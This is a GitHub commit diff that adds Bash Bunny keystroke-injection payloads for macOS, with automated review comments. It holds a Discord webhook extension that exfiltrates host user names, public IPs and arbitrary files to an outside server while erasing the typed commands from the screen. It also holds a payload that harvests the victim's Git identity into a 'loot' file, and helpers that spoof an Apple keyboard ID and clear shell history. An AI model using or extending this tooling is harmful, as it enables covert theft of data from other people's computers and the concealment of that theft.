Merge pull request #650 from quentinlamamy/master

Submit Discord exfiltration extension + Github Information Exfiltration Payload
pull/252/merge
Peaks 2024-09-03 12:11:48 -04:00 committed by GitHub
commit 257081013d
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
4 changed files with 452 additions and 0 deletions

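--- a/payloads/extensions/discord.sh
+++ b/payloads/extensions/discord.sh
@@ -0,0 +1,86 @@
+#!/bin/bash
+#
+# Title: Discord Extension
+# Description: Interact with discord webhook to exfiltrate text or files
+# Author: quentin_lamamy <contact@quentin-lamamy.fr>
+# Version: 1.0
+# Category: Extension
+#
+# To use this extension, you need to create a webhook on discord and get the webhook id and token
+# During your setup steps, you need to set the DISCORD_WEBHOOK_ID and DISCORD_WEBHOOK_TOKEN variables
+# DISCORD_WEBHOOK_ID="<DISCORD_WEBHOOK_ID>""
+# DISCORD_WEBHOOK_TOKEN="<DISCORD_WEBHOOK_TOKEN>"
+function DISCORD() {
+case $1 in
+# @desc Initialize the exfiltration session by posting an embed message on discord with host information
+# @usage DISCORD INIT
+# @info This command need a $BB_HOST_* variables (Set by default if you use my OSX extension)
+"INIT")
+curl_location="https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN"
+curl_header="Content-Type: application/json"
+Q STRING "printf '\e7'"
+Q ENTER
+Q STRING "curl --location '$curl_location'"
+Q STRING " --header '$curl_header'"
+Q STRING " --data '{\"embeds\": [{\"author\": {\"name\": \"New exfiltration session\",\"icon_url\": \"https://cdn-icons-png.flaticon.com/512/2/2235.png\"},\"color\": \"15258703\",\"fields\": [{\"name\":\"OS\",\"value\":\""
+Q STRING "'\${BB_HOST_OS}'"
+Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
+Q STRING "'\${BB_HOST_IP_V4}'"
+Q STRING "\",\"inline\":true},{\"name\":\"Public ip\",\"value\":\""
+Q STRING "'\${BB_HOST_IP_V6}'"
+Q STRING "\",\"inline\":true},{\"name\":\"User\",\"value\":\""
+Q STRING "'\${BB_HOST_USER}'"
+Q STRING "\",\"inline\":true}]"
+Q STRING "}]}'"
+Q ENTER
+Q STRING "printf '\e8\e[1A\e[0J'"
+Q ENTER
+;;
+"SEND")
+case $2 in
+# @desc Send a message to discord via webhook
+# @usage DISCORD SEND MSG $yourMessage
+"MSG")
+if [[ "$3" == *"$"* ]]; then
+message="'$3'"
+else
+message=$3
+fi
+Q STRING "printf '\e7'"
+Q ENTER
+Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --header 'Content-Type: application/json' --data '{\"content\": \"$message\"}' && printf '\e[3A\e[K\e[0J'"
+Q ENTER
+Q STRING "printf '\e8\e[1A\e[0J'"
+Q ENTER
+;;
+# @desc Send a file to discord via webhook
+# @usage DISCORD SEND FILE $yourFilePath
+"FILE")
+Q STRING "printf '\e7'"
+Q ENTER
+Q STRING "curl --location 'https://discord.com/api/webhooks/$DISCORD_WEBHOOK_ID/$DISCORD_WEBHOOK_TOKEN' --form '=@\"$3\"' && printf '\e[3A\e[K\e[0J'"
+Q ENTER
+Q STRING "printf '\e8\e[1A\e[0J'"
+Q ENTER
+;;
+esac
+;;
+esac
+}
+export -f DISCORD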
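Review bot: The INIT embed labels both the IPv4 and the IPv6 field `"Public ip"` (the second `{\"name\":\"Public ip\"` precedes `BB_HOST_IP_V6`), so the two values cannot be told apart in the resulting message; the labels should be distinct, e.g. `\"name\":\"Public ip v4\"` and `\"name\":\"Public ip v6\"`. The setup example in the header comment carries a stray trailing quote, `# DISCORD_WEBHOOK_ID="<DISCORD_WEBHOOK_ID>""`, which anyone copying the line will inherit. Neither `case` has a `*)` arm, so a misspelled subcommand (e.g. `DISCORD SEND MESSAGE`) silently does nothing; a `*) printf 'DISCORD: unknown command %s\n' "$*" >&2 ;;` arm on each `case` would make such typos visible.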

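--- a/payloads/extensions/osx.sh
+++ b/payloads/extensions/osx.sh
@@ -0,0 +1,278 @@
+#!/bin/bash
+#
+# Title: OSX Extension
+# Description: Allow a bunch of osx interaction
+# Author: quentin_lamamy <contact@quentin-lamamy.fr>
+# Version: 2.0
+# Category: Extension
+function OSX() {
+case $1 in
+"TERMINAL")
+case $2 in
+# @desc Open a terminal
+# @usage OSX TERMINAL OPEN
+"OPEN")
+Q GUI SPACE
+Q STRING terminal
+Q ENTER
+;;
+# @desc Initialize the terminal
+# Make the PS1 nicer (just because I like it)
+# Grab Host information and store it in BB_OSX vars
+# @usage OSX TERMINAL INIT
+# @info This command need a focused terminal
+"INIT")
+Q STRING "bash"
+Q ENTER
+Q STRING "clear"
+Q ENTER
+Q STRING "printf '\e7'"
+Q ENTER
+Q STRING "export PS1='\e[0;31mbashbunny>\e[m '"
+Q ENTER
+Q STRING 'BB_HOST_USER=$(whoami)'
+Q ENTER
+Q STRING 'BB_HOST_NAME=$(hostname)'
+Q ENTER
+Q STRING "BB_HOST_OS='OSX'"
+Q ENTER
+Q STRING 'BB_HOST_IP_V4=$(curl -s ipinfo.io/ip)'
+Q ENTER
+Q STRING 'BB_HOST_IP_V6=$(curl -s ident.me)'
+Q ENTER
+Q STRING "printf '\e8\e[1A\e[0J'"
+Q ENTER
+;;
+# @desc Minimize the terminal
+# @usage OSX TERMINAL MINIMIZE
+# @info This command need a focused terminal
+"MINIMIZE")
+Q STRING 'printf \e[2t'
+Q ENTER
+;;
+# @desc Resize the focused terminal
+# @usage OSX TERMINAL RESIZE $width $height
+# @param <integer> $width The terminal width
+# @param <integer> $height The terminal height
+# @info This command need a focused terminal
+"RESIZE")
+Q STRING "printf '\e[8;'$4';'$3't' && printf '\e[2A\e[K\e[0J'"
+Q ENTER
+;;
+# @desc Clear the focused terminal
+# @usage OSX TERMINAL ZOOM
+# @info This command need a focused terminal
+"CLEAR")
+Q STRING clear
+Q ENTER
+;;
+# @desc Close all terminal
+# @usage OSX TERMINAL CLOSE
+# @info This command need a focused terminal
+"CLOSE")
+Q STRING history -c
+Q ENTER
+Q STRING killall Terminal
+Q ENTER
+;;
+# @desc Change terminal window name
+# @usage OSX TERMINAL NAME <WINDOW_NAME>
+# @info This command need a focused terminal
+"NAME")
+Q STRING "printf '\033]0;'$3'\007' && printf '\e[2A\e[K\e[0J'"
+Q ENTER
+;;
+esac
+;;
+"NETWORK")
+case $2 in
+"WIFI")
+case $3 in
+# @desc Enable wifi
+# @usage OSX NETWORK WIFI ENABLE
+"ENABLE")
+Q STRING "networksetup -setairportpower en0 on"
+Q ENTER
+;;
+# @desc Disable wifi
+# @usage OSX NETWORK WIFI DISABLE
+"DISABLE")
+Q STRING "networksetup -setairportpower en0 off"
+Q ENTER
+;;
+# @desc Connect to a wifi network
+# @usage OSX NETWORK CONNECT $ssid $password
+# @arg <string> Wifi SSID
+# @arg <string> Wifi Password
+"CONNECT")
+Q STRING "networksetup -setairportnetwork en0 $4 $5"
+Q ENTER
+;;
+esac
+;;
+"ETHERNET")
+;;
+esac
+;;
+"SESSION")
+case $2 in
+# @desc Shutdown the computer
+# @usage OSX SESSION SHUTDOWN
+"SHUTDOWN")
+Q STRING "osascript -e 'tell app \"System Events\" to shut down'"
+Q ENTER
+;;
+# @desc Restart the computer
+# @usage OSX SESSION RESTART
+"RESTART")
+Q STRING "osascript -e 'tell app \"System Events\" to restart'"
+Q ENTER
+;;
+# @desc Lock the computer
+# @usage OSX SESSION LOCK
+"LOCK")
+Q STRING "osascript -e 'tell app \"System Events\" to sleep'"
+Q ENTER
+;;
+# @desc Logout current session
+# @usage OSX SESSION LOGOUT
+"LOGOUT")
+Q STRING "osascript -e 'tell app \"System Events\" to log out'"
+Q ENTER
+;;
+"GET_USER")
+#Q STRING "BB_OSX_USER=$(who | grep console | cut -d ' ' -f 1)"
+Q STRING 'BB_OSX_USER=$(whoami)'
+Q ENTER
+;;
+esac
+;;
+"SOUND")
+case $2 in
+"PLAY")
+Q STRING "afplay $3"
+;;
+# @desc Change the computer volume
+# @usage OSX MISC VOLUME $volumeValue
+# @arg <integer> An integer between 0 and 10
+"VOLUME")
+Q STRING "osascript -e 'set Volume $3'"
+Q ENTER
+;;
+esac
+;;
+"NOTIFICATION")
+case $2 in
+"CLEAR")
+Q STRING "ps -e | grep /NotificationCenter | grep app | cut -d ' ' -f 1 | xargs kill -9 && printf '\e[2A\e[K\e[0J'"
+Q ENTER
+;;
+"DISPLAY")
+if [ -z $6]; then
+$6=${1:-"Purr"}
+fi
+Q STRING "osascript -e 'display notification \"$3\" with title \"$4\" subtitle \"$5\" sound name \"$6\"'"
+Q ENTER
+;;
+esac
+;;
+"MISC")
+case $2 in
+# @desc Show or hide desktop icon
+# @usage OSX MISC DESKTOP_ICON $action
+# @arg <string> HIDE | void
+"DESKTOP_ICON")
+if [ $3 == "HIDE" ]; then
+Q STRING "defaults write com.apple.finder CreateDesktop -bool false && killall Finder"
+Q ENTER
+else
+Q STRING "defaults write com.apple.finder CreateDesktop -bool true && killall Finder"
+Q ENTER
+fi
+;;
+# @desc Change wallpaper with the specified url image
+# @usage OSX MISC WALLPAPER_URL
+"WALLPAPER_URL")
+Q STRING "cd ~/Desktop"
+Q ENTER
+Q STRING "curl $3 > img.bb"
+Q ENTER
+Q STRING "sqlite3 ~/Library/Application\ Support/Dock/desktoppicture.db \"update data set value = '~/Desktop/img.bb'\" && killall Dock"
+Q ENTER
+;;
+# @desc Say something in the way of bigben
+# @usage OSX MISC SAY <VOICE> <TEXT_TO_SAY>
+# @info Need a focused terminal
+"SAY")
+Q STRING "say -v $3 $4 && printf '\e[2A\e[K\e[0J'"
+Q ENTER
+;;
+esac
+;;
+esac
+}
+export -f OSX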
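Review bot: The NOTIFICATION DISPLAY arm is not valid bash: `if [ -z $6]; then` has no space before `]`, and `$6=${1:-"Purr"}` tries to assign to a positional parameter (bash expands it and looks for a command of that name) while `${1:-"Purr"}` reads `$1`, which is `NOTIFICATION` here, not the missing sound argument. The three lines can be replaced by `local sound=${6:-Purr}` with `\"$sound\"` used in place of `\"$6\"` in the osascript string. Several `@usage` tags also disagree with the arm they document: CLEAR is tagged `OSX TERMINAL ZOOM`, WIFI CONNECT is tagged `OSX NETWORK CONNECT` (the `WIFI` level is missing), and VOLUME is tagged `OSX MISC VOLUME` although it lives under `SOUND`. The `@usage` lines are what a payload author copies, so they should match the `case` labels exactly.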


@ -0,0 +1,30 @@
<div align="center">
# Github Information Exfiltration
**Get Git user name and email from the Git global config and exfiltrate them**
![Bash](https://img.shields.io/badge/Shell_Script-121011?style=for-the-badge&logo=gnu-bash&logoColor=white)
![Quack](https://img.shields.io/badge/Ducky_Script-121011?style=for-the-badge&logo=duck&logoColor=white)
![OSX](https://img.shields.io/badge/OSX-FFFFFF?style=for-the-badge&logo=apple&logoColor=black)
</div>
<img width="1000" alt="banner" src="https://raw.githubusercontent.com/quentinlamamy/bashbunny/main/img/githubExfiltration.jpg"/>
# Dependency
* OSX Extension by quentin_lamamy
# Changelog
v1.0 :
* :tada: Release on 2023/08/20
# Contributing
A bug ? An idea of feature ? [Fill an issue on github](https://github.com/quentinlamamy/bashbunny/issues)
# License
<p xmlns:cc="http://creativecommons.org/ns#" xmlns:dct="http://purl.org/dc/terms/"><a property="dct:title" rel="cc:attributionURL" href="https://github.com/quentinlamamy/bashbunny/blob/main/payloads/githubExfiltration/payload.txt">Github Infos Exfiltration Payload</a> by <a rel="cc:attributionURL dct:creator" property="cc:attributionName" href="https://github.com/quentinlamamy">Quentin Lamamy</a> is licensed under <a href="http://creativecommons.org/licenses/by-nc-sa/4.0/?ref=chooser-v1" target="_blank" rel="license noopener noreferrer" style="display:inline-block;">CC BY-NC-SA 4.0<img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/nc.svg?ref=chooser-v1"><img style="height:22px!important;margin-left:3px;vertical-align:text-bottom;" src="https://mirrors.creativecommons.org/presskit/icons/sa.svg?ref=chooser-v1"></a></p>
# Support
<a href="https://www.buymeacoffee.com/quentinlamamy" target="_blank"><img src="https://cdn.buymeacoffee.com/buttons/default-orange.png" alt="Buy Me A Coffee" height="41" width="174"></a>


@ -0,0 +1,58 @@
#!/bin/bash
#
# Title: OSX Payload to exfiltrate Git user name and email
# Description: Get Git user name and email from the Git global config and exfiltrate them
# Author: quentin_lamamy <contact@quentin-lamamy.fr>
# Version: 1.0
# Category: Exfiltration
# Attackmodes: HID STORAGE
# Target OS: OSX
# Dependency: OSX Extensions
#
# Magenta solid Setup
# Yellow single blink Attack in progress
# Yellow double blink Sync
# Yellow triple blink Cleanup
# Green blink then solid Finished
LED SETUP
ATTACKMODE STORAGE HID VID_0X05AC PID_0X0250
OSX TERMINAL OPEN
Q STRING 'last_mounted_volume=$(ls -t /Volumes | head -n 1)'
Q ENTER
Q STRING 'lootPath=/Volumes/$last_mounted_volume/loot/gitInfos.txt'
Q ENTER
Q STRING 'touch $lootPath'
Q ENTER
LED ATTACK
# Get the user name from the Git global config
Q STRING 'user_name=$(git config --global user.name)'
Q ENTER
# Get the user email from the Git global config
Q STRING 'user_email=$(git config --global user.email)'
Q ENTER
Q STRING 'echo -e "Username: $user_name\nMail: $user_email" > $lootPath'
Q ENTER
# Sync
LED STAGE 2
sync
# Cleanup
LED STAGE 3
# Eject
QUACK STRING 'diskutil eject $last_mounted_volume'
QUACK ENTER
DELAY 100
OSX TERMINAL CLOSE
LED FINISH
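Review bot: The eject step uses the long form `QUACK STRING 'diskutil eject $last_mounted_volume'` / `QUACK ENTER` while every other line in the payload (and both extensions in this PR) uses `Q`; for consistency these two lines should be `Q STRING 'diskutil eject $last_mounted_volume'` and `Q ENTER`. The LED legend in the header (`Yellow double blink Sync`, `Yellow triple blink Cleanup`) appears to describe the `LED STAGE 2` and `LED STAGE 3` calls below but is not tied to them; a short comment next to each call, e.g. `# Yellow double blink (see legend above)`, would keep the legend and the code from drifting apart. The file header for this section is not shown on the page, so the path the note applies to cannot be confirmed here.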